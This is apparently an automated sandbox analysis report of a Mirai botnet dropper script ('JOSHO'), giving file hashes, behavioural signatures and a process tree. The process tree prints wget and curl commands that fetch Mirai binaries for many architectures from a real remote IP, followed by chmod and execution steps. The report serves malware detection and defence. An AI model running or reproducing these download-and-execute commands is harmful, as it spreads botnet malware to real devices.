Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240226-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240226-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    27-04-2024 17:59

General

  • Target

    8UsA.sh

  • Size

    1KB

  • MD5

    d060b7e197e9a5ef62013de9b1246b0e

  • SHA1

    954455791558cc2be3dc1b451f70a40e1de04f3a

  • SHA256

    09ae6fb139fb48daf4a6fb4c6754a040367836054ed902f19211806696470cc9

  • SHA512

    338d74f70ad3b05762ea3a1e127e00d1e08ffd1c4569d7745b58894bfec1304ef353a40229271f342266637fc2eed2390cb7922c7dadce5b365a8c18e83a82df

Score
10/10

Malware Config

Extracted

Family

mirai

Botnet

JOSHO

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 20 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Changes its process name 10 IoCs
  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/8UsA.sh
    /tmp/8UsA.sh
    1⤵
    • Writes file to tmp directory
    PID:1575
    • /usr/bin/wget
      wget http://209.14.69.249/AB4g5/Josho.x86
      2⤵
      • Writes file to tmp directory
      PID:1576
    • /usr/bin/curl
      curl -O http://209.14.69.249/AB4g5/Josho.x86
      2⤵
      • Writes file to tmp directory
      PID:1591
    • /bin/cat
      cat Josho.x86
      2⤵
        PID:1592
      • /bin/chmod
        chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
        2⤵
          PID:1593
        • /tmp/3AvA
          ./3AvA ssh
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Changes its process name
          PID:1594
        • /usr/bin/wget
          wget http://209.14.69.249/AB4g5/Josho.mips
          2⤵
          • Writes file to tmp directory
          PID:1597
        • /usr/bin/curl
          curl -O http://209.14.69.249/AB4g5/Josho.mips
          2⤵
          • Writes file to tmp directory
          PID:1599
        • /bin/chmod
          chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.mips Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
          2⤵
            PID:1601
          • /tmp/3AvA
            ./3AvA ssh
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Changes its process name
            PID:1602
          • /usr/bin/wget
            wget http://209.14.69.249/AB4g5/Josho.mpsl
            2⤵
            • Writes file to tmp directory
            PID:1605
          • /usr/bin/curl
            curl -O http://209.14.69.249/AB4g5/Josho.mpsl
            2⤵
            • Writes file to tmp directory
            PID:1607
          • /bin/chmod
            chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
            2⤵
              PID:1609
            • /tmp/3AvA
              ./3AvA ssh
              2⤵
              • Executes dropped EXE
              • Modifies Watchdog functionality
              • Changes its process name
              PID:1610
            • /usr/bin/wget
              wget http://209.14.69.249/AB4g5/Josho.arm4
              2⤵
                PID:1613
              • /usr/bin/curl
                curl -O http://209.14.69.249/AB4g5/Josho.arm4
                2⤵
                • Writes file to tmp directory
                PID:1615
              • /bin/chmod
                chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
                2⤵
                  PID:1617
                • /tmp/3AvA
                  ./3AvA ssh
                  2⤵
                  • Executes dropped EXE
                  • Modifies Watchdog functionality
                  • Changes its process name
                  PID:1618
                • /usr/bin/wget
                  wget http://209.14.69.249/AB4g5/Josho.arm5
                  2⤵
                  • Writes file to tmp directory
                  PID:1621
                • /usr/bin/curl
                  curl -O http://209.14.69.249/AB4g5/Josho.arm5
                  2⤵
                  • Writes file to tmp directory
                  PID:1623
                • /bin/chmod
                  chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
                  2⤵
                    PID:1625
                  • /tmp/3AvA
                    ./3AvA ssh
                    2⤵
                    • Executes dropped EXE
                    • Modifies Watchdog functionality
                    • Changes its process name
                    PID:1626
                  • /usr/bin/wget
                    wget http://209.14.69.249/AB4g5/Josho.arm6
                    2⤵
                    • Writes file to tmp directory
                    PID:1629
                  • /usr/bin/curl
                    curl -O http://209.14.69.249/AB4g5/Josho.arm6
                    2⤵
                    • Writes file to tmp directory
                    PID:1631
                  • /bin/chmod
                    chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
                    2⤵
                      PID:1633
                    • /tmp/3AvA
                      ./3AvA ssh
                      2⤵
                      • Executes dropped EXE
                      • Modifies Watchdog functionality
                      • Changes its process name
                      PID:1634
                    • /usr/bin/wget
                      wget http://209.14.69.249/AB4g5/Josho.arm7
                      2⤵
                      • Writes file to tmp directory
                      PID:1637
                    • /usr/bin/curl
                      curl -O http://209.14.69.249/AB4g5/Josho.arm7
                      2⤵
                      • Writes file to tmp directory
                      PID:1639
                    • /bin/chmod
                      chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
                      2⤵
                        PID:1641
                      • /tmp/3AvA
                        ./3AvA ssh
                        2⤵
                        • Executes dropped EXE
                        • Modifies Watchdog functionality
                        • Changes its process name
                        PID:1642
                      • /usr/bin/wget
                        wget http://209.14.69.249/AB4g5/Josho.ppc
                        2⤵
                        • Writes file to tmp directory
                        PID:1645
                      • /usr/bin/curl
                        curl -O http://209.14.69.249/AB4g5/Josho.ppc
                        2⤵
                        • Writes file to tmp directory
                        PID:1647
                      • /bin/chmod
                        chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.mips Josho.mpsl Josho.ppc Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
                        2⤵
                          PID:1649
                        • /tmp/3AvA
                          ./3AvA ssh
                          2⤵
                          • Executes dropped EXE
                          • Modifies Watchdog functionality
                          • Changes its process name
                          PID:1650
                        • /usr/bin/wget
                          wget http://209.14.69.249/AB4g5/Josho.m68k
                          2⤵
                          • Writes file to tmp directory
                          PID:1653
                        • /usr/bin/curl
                          curl -O http://209.14.69.249/AB4g5/Josho.m68k
                          2⤵
                          • Writes file to tmp directory
                          PID:1655
                        • /bin/chmod
                          chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.m68k Josho.mips Josho.mpsl Josho.ppc Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
                          2⤵
                            PID:1657
                          • /tmp/3AvA
                            ./3AvA ssh
                            2⤵
                            • Executes dropped EXE
                            • Modifies Watchdog functionality
                            • Changes its process name
                            PID:1658
                          • /usr/bin/wget
                            wget http://209.14.69.249/AB4g5/Josho.sh4
                            2⤵
                            • Writes file to tmp directory
                            PID:1661
                          • /usr/bin/curl
                            curl -O http://209.14.69.249/AB4g5/Josho.sh4
                            2⤵
                            • Writes file to tmp directory
                            PID:1663
                          • /bin/chmod
                            chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.m68k Josho.mips Josho.mpsl Josho.ppc Josho.sh4 Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o
                            2⤵
                              PID:1665
                            • /tmp/3AvA
                              ./3AvA ssh
                              2⤵
                              • Executes dropped EXE
                              • Modifies Watchdog functionality
                              • Changes its process name
                              PID:1666

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • /tmp/Josho.x86

                            Filesize

                            46KB

                            MD5

                            a648e3916f191a59f47d07a49702d0eb

                            SHA1

                            1d9280fd392858f5dbe61aea4cfa2453ade97442

                            SHA256

                            0a82c84b8564ae5a178e3e8f6fc4550885055043928ee667e59efb035f9ccfc3

                            SHA512

                            73ef7ce042d0d165c327acd50e984a08b3d8450fb8821c8ef390a8dc02044128836ba7590bd035a072a9b7a4c94defed1256e85b03887788fa998e5648b5e587